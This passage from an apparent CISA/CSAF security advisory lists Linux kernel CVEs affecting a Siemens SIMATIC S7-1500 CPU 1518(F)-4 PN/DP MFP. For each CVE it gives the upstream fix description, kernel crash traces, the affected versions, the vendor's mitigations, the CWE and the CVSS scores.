<p>In the Linux kernel, the following vulnerability has been resolved: ipv6: Fix use-after-free in inet6_addr_del(). syzbot reported use-after-free of inet6_ifaddr in inet6_addr_del(). [0] The cited commit accidentally moved ipv6_del_addr() for mngtmpaddr before reading its ifp-&gt;flags for temporary addresses in inet6_addr_del(). Let's move ipv6_del_addr() down to fix the UAF. [0]: BUG: KASAN: slab-use-after-free in inet6_addr_del.constprop.0+0x67a/0x6b0 net/ipv6/addrconf.c:3117 Read of size 4 at addr ffff88807b89c86c by task syz.3.1618/9593 CPU: 0 UID: 0 PID: 9593 Comm: syz.3.1618 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 Call Trace: __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x116/0x1f0 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xcd/0x630 mm/kasan/report.c:482 kasan_report+0xe0/0x110 mm/kasan/report.c:595 inet6_addr_del.constprop.0+0x67a/0x6b0 net/ipv6/addrconf.c:3117 addrconf_del_ifaddr+0x11e/0x190 net/ipv6/addrconf.c:3181 inet6_ioctl+0x1e5/0x2b0 net/ipv6/af_inet6.c:582 sock_do_ioctl+0x118/0x280 net/socket.c:1254 sock_ioctl+0x227/0x6b0 net/socket.c:1375 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:597 [inline] __se_sys_ioctl fs/ioctl.c:583 [inline] __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f164cf8f749 Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 &lt;48&gt; 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f164de64038 EFLAGS: 00000246 ORIG_RAX: 0000000000000010 RAX: ffffffffffffffda RBX: 00007f164d1e5fa0 RCX: 00007f164cf8f749 RDX: 0000200000000000 RSI: 0000000000008936 RDI: 0000000000000003 RBP: 00007f164d013f91 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f164d1e6038 R14: 00007f164d1e5fa0 R15: 00007ffde15c8288 Allocated by task 9593: kasan_save_stack+0x33/0x60 mm/kasan/common.c:56 kasan_save_track+0x14/0x30 mm/kasan/common.c:77 poison_kmalloc_redzone mm/kasan/common.c:397 [inline] __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:414 kmalloc_noprof include/linux/slab.h:957 [inline] kzalloc_noprof include/linux/slab.h:1094 [inline] ipv6_add_addr+0x4e3/0x2010 net/ipv6/addrconf.c:1120 inet6_addr_add+0x256/0x9b0 net/ipv6/addrconf.c:3050 addrconf_add_ifaddr+0x1fc/0x450 net/ipv6/addrconf.c:3160 inet6_ioctl+0x103/0x2b0 net/ipv6/af_inet6.c:580 sock_do_ioctl+0x118/0x280 net/socket.c:1254 sock_ioctl+0x227/0x6b0 net/socket.c:1375 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:597 [inline] __se_sys_ioctl fs/ioctl.c:583 [inline] __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f Freed by task 6099: kasan_save_stack+0x33/0x60 mm/kasan/common.c:56 kasan_save_track+0x14/0x30 mm/kasan/common.c:77 kasan_save_free_info+0x3b/0x60 mm/kasan/generic.c:584 poison_slab_object mm/kasan/common.c:252 [inline] __kasan_slab_free+0x5f/0x80 mm/kasan/common.c:284 kasan_slab_free include/linux/kasan.h:234 [inline] slab_free_hook mm/slub.c:2540 [inline] slab_free_freelist_hook mm/slub.c:2569 [inline] slab_free_bulk mm/slub.c:6696 [inline] kmem_cache_free_bulk mm/slub.c:7383 [inline] kmem_cache_free_bulk+0x2bf/0x680 mm/slub.c:7362 kfree_bulk include/linux/slab.h:830 [inline] kvfree_rcu_bulk+0x1b7/0x1e0 mm/slab_common.c:1523 kvfree_rcu_drain_ready mm/slab_common.c:1728 [inline] kfree_rcu_monitor+0x1d0/0x2f0 mm/slab_common.c:1801 process_one_work+0x9ba/0x1b20 kernel/workqueue.c:3257 process_scheduled_works kernel/workqu ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23010">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/825.html">CWE-825 Expired Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23011</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ipv4: ip_gre: make ipgre_header() robust Analog to commit db5b4e39c4e6 ("ip6_gre: make ip6gre_header() robust") Over the years, syzbot found many ways to crash the kernel in ipgre_header() [1]. This involves team or bonding drivers ability to dynamically change their dev-&gt;needed_headroom and/or dev-&gt;hard_header_len In this particular crash mld_newpack() allocated an skb with a too small reserve/headroom, and by the time mld_sendpack() was called, syzbot managed to attach an ipgre device. [1] skbuff: skb_under_panic: text:ffffffff89ea3cb7 len:2030915468 put:2030915372 head:ffff888058b43000 data:ffff887fdfa6e194 tail:0x120 end:0x6c0 dev:team0 kernel BUG at net/core/skbuff.c:213 ! Oops: invalid opcode: 0000 [#1] SMP KASAN PTI CPU: 1 UID: 0 PID: 1322 Comm: kworker/1:9 Not tainted syzkaller #0 PREEMPT(full) Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025 Workqueue: mld mld_ifc_work RIP: 0010:skb_panic+0x157/0x160 net/core/skbuff.c:213 Call Trace: skb_under_panic net/core/skbuff.c:223 [inline] skb_push+0xc3/0xe0 net/core/skbuff.c:2641 ipgre_header+0x67/0x290 net/ipv4/ip_gre.c:897 dev_hard_header include/linux/netdevice.h:3436 [inline] neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618 NF_HOOK_COND include/linux/netfilter.h:307 [inline] ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247 NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318 mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855 mld_send_cr net/ipv6/mcast.c:2154 [inline] mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693 process_one_work kernel/workqueue.c:3257 [inline] process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340 worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421 kthread+0x711/0x8a0 kernel/kthread.c:463 ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23011">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/124.html">CWE-124 Buffer Underwrite ('Buffer Underflow')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.6</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23019</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: marvell: prestera: fix NULL dereference on devlink_alloc() failure devlink_alloc() may return NULL on allocation failure, but prestera_devlink_alloc() unconditionally calls devlink_priv() on the returned pointer. This leads to a NULL pointer dereference if devlink allocation fails. Add a check for a NULL devlink pointer and return NULL early to avoid the crash.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23019">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>4.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23026</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: dmaengine: qcom: gpi: Fix memory leak in gpi_peripheral_config() Fix a memory leak in gpi_peripheral_config() where the original memory pointed to by gchan-&gt;config could be lost if krealloc() fails. The issue occurs when: 1. gchan-&gt;config points to previously allocated memory 2. krealloc() fails and returns NULL 3. The function directly assigns NULL to gchan-&gt;config, losing the reference to the original memory 4. The original memory becomes unreachable and cannot be freed Fix this by using a temporary variable to hold the krealloc() result and only updating gchan-&gt;config when the allocation succeeds. Found via static analysis and code review.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23026">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/772.html">CWE-772 Missing Release of Resource after Effective Lifetime</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23038</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: pnfs/flexfiles: Fix memory leak in nfs4_ff_alloc_deviceid_node() In nfs4_ff_alloc_deviceid_node(), if the allocation for ds_versions fails, the function jumps to the out_scratch label without freeing the already allocated dsaddrs list, leading to a memory leak. Fix this by jumping to the out_err_drain_dsaddrs label, which properly frees the dsaddrs list before cleaning up other resources.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23038">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/772.html">CWE-772 Missing Release of Resource after Effective Lifetime</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23054</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: hv_netvsc: reject RSS hash key programming without RX indirection table RSS configuration requires a valid RX indirection table. When the device reports a single receive queue, rndis_filter_device_add() does not allocate an indirection table, accepting RSS hash key updates in this state leads to a hang. Fix this by gating netvsc_set_rxfh() on ndc-&gt;rx_table_sz and return -EOPNOTSUPP when the table is absent. This aligns set_rxfh with the device capabilities and prevents incorrect behavior.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23054">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23060</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: crypto: authencesn - reject too-short AAD (assoclen&lt;8) to match ESP/ESN spec authencesn assumes an ESP/ESN-formatted AAD. When assoclen is shorter than the minimum expected length, crypto_authenc_esn_decrypt() can advance past the end of the destination scatterlist and trigger a NULL pointer dereference in scatterwalk_map_and_copy(), leading to a kernel panic (DoS). Add a minimum AAD length check to fail fast on invalid inputs.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23060">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23083</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: fou: Don't allow 0 for FOU_ATTR_IPPROTO. fou_udp_recv() has the same problem mentioned in the previous patch. If FOU_ATTR_IPPROTO is set to 0, skb is not freed by fou_udp_recv() nor "resubmit"-ted in ip_protocol_deliver_rcu(). Let's forbid 0 for FOU_ATTR_IPPROTO.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23083">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.3</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23084</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: be2net: Fix NULL pointer dereference in be_cmd_get_mac_from_list When the parameter pmac_id_valid argument of be_cmd_get_mac_from_list() is set to false, the driver may request the PMAC_ID from the firmware of the network card, and this function will store that PMAC_ID at the provided address pmac_id. This is the contract of this function. However, there is a location within the driver where both pmac_id_valid == false and pmac_id == NULL are being passed. This could result in dereferencing a NULL pointer. To resolve this issue, it is necessary to pass the address of a stub variable to the function.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23084">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
